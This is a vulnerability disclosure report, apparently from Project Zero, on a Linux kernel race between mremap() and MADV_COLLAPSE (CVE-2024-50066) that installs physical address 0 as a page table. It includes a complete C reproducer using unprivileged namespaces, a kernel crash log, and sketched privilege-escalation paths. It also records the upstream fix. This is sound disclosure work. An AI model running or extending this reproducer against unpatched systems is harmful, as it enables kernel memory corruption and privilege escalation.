Linux 6.6 Race Condition

Summary

I found a security-relevant race between mremap() and THP code. Reaching the buggy code typically requires the ability to create unprivileged namespaces. The bug leads to installing physical address 0 as a page table, which is likely exploitable in several ways: For example, triggering the bug in multiple processes can probably lead to unintended page table sharing, which probably can lead to stale TLB entries pointing to freed pages.

I also found two other (untested) theoretical races, but those arguably might not even count as bugs, and I’m pretty sure they’re not security bugs. I am including my analysis of the closely related non-issues 2 and 3 as context in case you’re curious, but I think they’re stuff we can deal with on the public list later (or maybe even just leave as-is). Feel free to ignore that part of this report.

I will send a suggested patch for the security bug, but I think it’s unclear if my patch is actually the right way to fix it.

This bug is subject to a 90-day disclosure deadline. If a fix for this issue is made available to users before the end of the 90-day deadline, this bug report will become public 30 days after the fix was made available. Otherwise, this bug report will become public at the deadline. The scheduled deadline is 2024-12-31.

For more details, see the Project Zero vulnerability disclosure policy: https://googleprojectzero.blogspot.com/p/vulnerability-disclosure-policy.html
Security bug: move_normal_pmd vs MADVISE_COLLAPSE
Description

In mremap(), move_page_tables() looks at the type of the PMD entry and the specified address range to figure out by which method the next chunk of page table entries should be moved. At that point, the mmap_lock is held in write mode, but no rmap locks are held. For PMD entries that point to page tables and are fully covered by the source address range, move_pgt_entry(NORMAL_PMD, …) is called, which first takes rmap locks, then does move_normal_pmd().

move_normal_pmd() takes the necessary page table locks at source and destination, then moves an entire page table from the source to the destination:

/* Clear the pmd */
pmd = *old_pmd;
pmd_clear(old_pmd);

VM_BUG_ON(!pmd_none(*new_pmd));

pmd_populate(mm, new_pmd, pmd_pgtable(pmd));
flush_tlb_range(vma, old_addr, old_addr + PMD_SIZE);

The problem is: The rmap locks, which protect against concurrent page table removal by retract_page_tables() in the THP code, are only taken after we have inspected the PMD entry to decide how to move it. So we can race as follows (with two processes that have mappings of the same tmpfs file that is stored on a tmpfs mount with huge=advise):

process A process B
========= =========
mremap
mremap_to
move_vma
move_page_tables
get_old_pmd
alloc_new_pmd
*** PREEMPT ***
madvise(MADV_COLLAPSE)
do_madvise
madvise_walk_vmas
madvise_vma_behavior
madvise_collapse
hpage_collapse_scan_file
collapse_file
retract_page_tables
i_mmap_lock_read(mapping)
pmdp_collapse_flush
i_mmap_unlock_read(mapping)
move_pgt_entry(NORMAL_PMD, …)
take_rmap_locks
move_normal_pmd
drop_rmap_locks

In this case, while move_normal_pmd() expects to see a PMD entry pointing to a page table, the PMD entry has actually been cleared. So this line:

pmd_populate(mm, new_pmd, pmd_pgtable(pmd));

runs pmd_pgtable() on a cleared PMD entry. On typical implementations (including the X86 one), this simply masks off some bits of pmd and assumes that the remainder is a physical address – so pmd_pgtable(0) returns a pointer to the page for physical address 0. Then, pmd_populate() constructs a PMD entry that points to this physical address as a page table.

So this ends up installing physical address 0 as a page table.
Fixing it

I guess there are two ways we could fix this:

Hold the rmap locks much more broadly in move_page_tables(). In particular, take them before inspecting the source pmd, and if we do a PMD-level move, keep them held throughout the entire move.
Add a bunch of extra recheck/retry logic.

I think the first option is nicer in terms of code complexity. Moving the lock up requires a small bit of refactoring though, and the broader locking could conceivably degrade the performance of concurrent rmap access.

I will send a suggested patch for the first option in a minute (and I have tested that with that patch, my reproducer no longer triggers); but we might want to do some more bikeshedding of whether this is the right way to patch it, and if yes, whether the patch is doing too little lock-dropping for performance or adds too much complexity with the lock-dropping…
Reproducer

I made a testcase that triggers this issue after a while and causes a splat when the kernel later tries to unmap this page table at physical address 0:

#define _GNU_SOURCE
#include <err.h>
#include <sched.h>
#include <stdio.h>
#include <string.h>
#include <fcntl.h>
#include <signal.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/syscall.h>
#include <sys/stat.h>
#include <sys/prctl.h>
#include <sys/mount.h>
#include <sys/mman.h>
#include <sys/wait.h>
#include <sys/ioctl.h>

static void pin_to(int cpu) {
cpu_set_t cset;
CPU_ZERO(&cset);
CPU_SET(cpu, &cset);
if (sched_setaffinity(0, sizeof(cpu_set_t), &cset))
err(1, “set affinity”);
}

#ifndef MADV_COLLAPSE
#define MADV_COLLAPSE 25
#endif

#define SYSCHK(x) ({ \
typeof(x) __res = (x); \
if (__res == (typeof(x))-1) \
err(1, “SYSCHK(” #x “)”); \
__res; \
})

static void write_file(char *name, char *buf) {
int fd = SYSCHK(open(name, O_WRONLY));
if (write(fd, buf, strlen(buf)) != strlen(buf))
err(1, “write %s”, name);
close(fd);
}

static void write_map(char *name, int outer_id) {
char buf[100];
sprintf(buf, “0 %d 1”, outer_id);
write_file(name, buf);
}

int main(void) {
// set up new mount ns for tmpfs with THP
int outer_uid = getuid();
int outer_gid = getgid();
SYSCHK(unshare(CLONE_NEWNS|CLONE_NEWUSER));
SYSCHK(mount(NULL, “/”, NULL, MS_PRIVATE|MS_REC, NULL));
write_file(“/proc/self/setgroups”, “deny”);
write_map(“/proc/self/uid_map”, outer_uid);
write_map(“/proc/self/gid_map”, outer_gid);

// make tmpfs with THP
SYSCHK(mount(“none”, “/tmp”, “tmpfs”, MS_NOSUID|MS_NODEV, “huge=advise”));

pin_to(0);
while (1) {
int fd = SYSCHK(open(“/tmp/a”, O_RDWR|O_CREAT, 0600));
void *ptr = SYSCHK(mmap((void*)0x200000UL, 0x200000, PROT_READ|PROT_WRITE, MAP_SHARED|MAP_FIXED_NOREPLACE, fd, 0));
SYSCHK(ftruncate(fd, 0x1000));
*((volatile char *)ptr) = ‘a’;
SYSCHK(ftruncate(fd, 0x200000));
SYSCHK(madvise(ptr, 0x200000, MADV_HUGEPAGE));

close(fd);
SYSCHK(unlink(“/tmp/a”));
int child = SYSCHK(fork());
if (child == 0) {
for (int i=0; i<512; i++)
((volatile char *)ptr)[0x1000*i] = ‘a’;

struct sched_param param = { .sched_priority = 0 };
SYSCHK(sched_setscheduler(0, SCHED_IDLE, &param));

/* race (outer side, will be preempted) */
SYSCHK(mremap((void*)0x200000, 0x200000, 0x200000, MREMAP_MAYMOVE|MREMAP_FIXED, (void*)0x40000000));
return 0;
}

for (int i=0; i<512; i++)
((volatile char *)ptr)[0x1000*i] = ‘a’;

usleep(10);
/* race (inner side, will preempt after timer and voluntary resched) */
int madv_res = madvise(ptr, 0x200000, MADV_COLLAPSE);
if (madv_res == -1)
fprintf(stderr, “_”);

int wstatus;
SYSCHK(waitpid(child, &wstatus, 0));

SYSCHK(munmap(ptr, 0x200000));

fprintf(stderr, “.”);
}
}

Usage:

user@vm:~/collapse-vs-mremap$ gcc -o collapse-vs-mremap-2-noassist collapse-vs-mremap-2-noassist.c
user@vm:~/collapse-vs-mremap$ ./collapse-vs-mremap-2-noassist
…………………………………………………………………………………………………………………

Result on Linux 6.11 in a QEMU VM, where a bunch of non-zero data is left over in the first 0x1000 bytes of physical memory (note the pmd:00000067):

[ 120.427189] BUG: Bad page map in process collapse-vs-mre pte:f000ff53f000ff53 pmd:00000067
[ 120.428763] addr:0000000040000000 vm_flags:200000fb anon_vma:0000000000000000 mapping:ffff888007dd70f8 index:0
[ 120.430526] file:a fault:shmem_fault mmap:shmem_mmap read_folio:0x0
[ 120.431706] CPU: 0 UID: 1000 PID: 1219 Comm: collapse-vs-mre Tainted: G W 6.11.0 #493
[ 120.433591] Tainted: [W]=WARN
[ 120.434201] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.16.3-debian-1.16.3-2 04/01/2014
[ 120.435849] Call Trace:
[ 120.436375] <TASK>
[ 120.436843] dump_stack_lvl+0x53/0x70
[ 120.437570] print_bad_pte+0x4e6/0x8e0
[…][ 120.447625] vm_normal_page+0x1c8/0x260
[…][ 120.450162] unmap_page_range+0x914/0x3d10
[…][ 120.456954] unmap_vmas+0x1cc/0x390
[…][ 120.461123] exit_mmap+0x160/0x6c0
[…][ 120.465181] mmput+0xa0/0x3a0
[ 120.465793] do_exit+0x7cd/0x27f0
[…][ 120.472198] do_group_exit+0xac/0x230
[ 120.472916] __x64_sys_exit_group+0x3e/0x50
[ 120.473722] x64_sys_call+0x17f3/0x1800
[ 120.474469] do_syscall_64+0x4b/0x110
[ 120.475189] entry_SYSCALL_64_after_hwframe+0x76/0x7e
[…][ 120.489560] </TASK>

On other machines where physical page 0 contains only zeroes, the error is different and the kernel complains about the mm’s pagetable bytes counter being -4096 on process exit.
Impact

Reaching this bug requires that you can create shmem/file THP mappings – anonymous THP uses different code that doesn’t zap stuff under rmap locks. File THP is gated on an experimental config flag (CONFIG_READ_ONLY_THP_FOR_FS), so on normal distro kernels you need shmem THP to hit this bug. (Some Android kernels set CONFIG_READ_ONLY_THP_FOR_FS=y, but those kernels are older than 6.6, so they’re not affected.)

As far as I know, getting shmem THP normally requires that you can mount your own tmpfs with the right mount flags, so on normal Linux systems you usually need the ability to create your own user+mount namespace (like my reproducer does).

If you trigger this bug in two different processes, or in two different locations in the same process, you should get physical page 0 mapped in two different places. Assuming you know that a certain part of the page contains zeroes, you should be able to get page table entries installed through one of the mappings, and then access those page table entries through the other mapping of the same page table.

At that point, I think several bad things can happen that could lead to privilege escalation, though I haven’t tested that:

When a PTE is zapped through the page table’s first mapping, TLB flushes will only be done for the first mapping, but there can be TLB entries created through the second mapping. So you could probably end up with stale TLB entries pointing to freed pages.
If VMA 1 and VMA 2 share a page table, and you install an anonymous page through VMA 1, and then use mremap() on VMA 2 to move that PTE to another location, and then munmap() VMA 1, you’ll end up with an anonymous page that’s only mapped into a VMA that is not associated with the page’s anon_vma, which leads to kernel UAF. (See https://project-zero.issues.chromium.org/issues/42451486 and https://git.kernel.org/linus/2555283eb40d .)

I think the exploitability of this bug depends on whether a struct page has been allocated for physical address 0 – but that seems to be the case at least on the two X86 systems I tested this on.
Non-issue 2 (no impact): move_ptes vs MADVISE_COLLAPSE

move_ptes() locks the source and destination page tables as follows:

old_pte = pte_offset_map_lock(mm, old_pmd, old_addr, &old_ptl);
if (!old_pte)
return -EAGAIN;
new_pte = pte_offset_map_nolock(mm, new_pmd, new_addr, &new_ptl);
if (!new_pte) {
pte_unmap_unlock(old_pte, old_ptl);
return -EAGAIN;
}
if (new_ptl != old_ptl)
spin_lock_nested(new_ptl, SINGLE_DEPTH_NESTING);

pte_offset_map_nolock() followed by manually taking the page table lock does not (unlike pte_offset_map_lock()) protect against concurrent removal of the page table via retract_page_tables(); and that can happen when need_rmap_locks is false. So I think that after this block, we can end up with new_pte pointing to a page table that has already been scheduled for RCU-delayed freeing. The good news is that (as far as I understand) this can only happen when all the PTEs in the source page table are pte_none(), so no PTEs will actually be written to the detached destination page table, so nothing bad happens.
Non-issue 3 (probably no impact, untested): move_huge_pmd vs split_huge_page_to_list_to_order

The classic way mremap() used to work is:

We make a new VMA.
We move page table entries into the new VMA with move_page_tables(), creating page tables if necessary. Only page table entries are moved; the old page tables stay where they are.
If a page table allocation fails due to OOM, or if the ->mremap handler returns an error, we use move_page_tables() to move the page table entries back to the old VMA; this is expected to always succeed, since the old page tables still exist, so page table allocation should not happen.

As a comment in move_page_tables() explains:

/*
* On error, move entries back from new area to old,
* which will succeed since page tables still there,
* and then proceed to unmap new area instead of old.
*/

However, that does not hold in the following scenario, assuming that the architecture does not define HAVE_MOVE_PMD (which permits mremap() to move entire page tables):

move_vma() calls move_page_tables()
move_page_tables() moves an anonymous huge PMD entry.
move_page_tables() tries to move more page table entries, but page table allocation fails, and the function returns early.
Another racing process causes the huge PMD entry to be split via split_huge_page_to_list_to_order() (turning the huge PMD entry into a PMD entry pointing to a page table whose PTEs point to all the subpages).
move_vma() calls move_page_tables() in the reverse direction to move PTEs back.
move_page_tables() unexpectedly needs to allocate a new page table to move the PTEs generated by the huge PMD split, which again fails. PTEs are left behind in the destination area.
do_vmi_munmap() removes the temporary destination VMA and removes the left-behind PTEs in the destination area.

So in the end, an anonymous page has erroneously disappeared from the VMA, but I think that doesn’t lead to any major consequences.

FWIW, the architectures that define HAVE_ARCH_TRANSPARENT_HUGEPAGE without also defining HAVE_MOVE_PMD are: mips, loongarch, s390, sparc64, arc, arm.

I think similar things can probably also happen on x86/arm64 if, when moving PTEs back with move_pgt_entry(HPAGE_PMD, …), we race with a concurrent split_huge_page_to_list_to_order() such that move_huge_pmd() fails at the __pmd_trans_huge_lock() and we fall back to the move_ptes() path.
Comments
All comments
ja…@google.com <ja…@google.com> #2Oct 15, 2024 11:05AM

The fix for the security bug is currently in the MM tree at https://git.kernel.org/pub/scm/linux/kernel/git/akpm/mm.git/commit/?id=9118e3ff1212add463770537519dce4aed51cf94 , on the mm-hotfixes-unstable branch.
ja…@google.com <ja…@google.com> #3Oct 22, 2024 09:28AM
Marked as fixed, reassigned to ja…@google.com.

Fix landed as https://git.kernel.org/linus/6fa1066fc5d00cb9f1b0e83b7ff6ef98d26ba2aa (“mm/mremap: fix move_normal_pmd/retract_page_tables race”).

In stable releases:

6.6.58 (2024-10-22)
6.11.5 (2024-10-22)

Related CVE Number: CVE-2024-50066.

Credit: Jann Horn

نوشته های مشابه